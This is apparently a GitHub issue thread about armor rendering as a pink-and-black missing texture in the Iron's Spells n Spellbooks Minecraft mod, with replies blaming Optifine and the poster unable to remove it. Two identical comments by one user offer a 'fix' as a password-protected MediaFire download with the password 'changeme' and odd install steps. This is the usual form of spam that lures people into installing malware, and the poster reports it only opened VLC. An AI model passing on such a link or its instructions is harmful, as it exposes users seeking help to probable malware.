### ISSUE TITLE
[Bug] Armors not rendering

### ISSUE THREAD

**Issue by 0kstar** [iron431/Irons-Spells-n-Spellbooks#564]
### Observed behaviour

<img width="723" alt="Screenshot 2024-08-31 at 12 59 41" src="https://github.com/user-attachments/assets/0abeff96-1291-490a-9209-37fddf3d1a66">
Heres what armor looks like.
It's pink and black and seems to be a missing texture placeholder

### Expected behaviour

Armor working

### Steps to reproduce

1. Download Mod
2. Go into creative get armor, equip
3. Look at your survival inventory or go in 3rd person
4. Pink man

### Server Type

Single Player

### Iron's Spells N Spellbooks version

1.20.1

### Forge version

1.20.1

### Other mods

None

**Comment by meeprdib** [comment]
Uninstall Optifine and use mods that are more mod-friendly, such as [Embeddium](https://www.curseforge.com/minecraft/mc-mods/embeddium) for performance and [Oculus ](https://www.curseforge.com/minecraft/mc-mods/oculus)for shaders

**Comment by 0kstar** [comment]
problem 2: optifine is not uninstalling
(im on mac)
Whenever i throw optifine away and then start up minecraft again, it automatically appears for no reason

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by 0kstar** [comment]
sorry what?

**Comment by 0kstar** [comment]
I dont understand, and optifine keeps coming back

**Comment by 0kstar** [comment]
all that fix thing is doing is opening VLC

**Comment by iron431** [comment]
uninstall optifine

**Comment by 0kstar** [comment]
I cant.
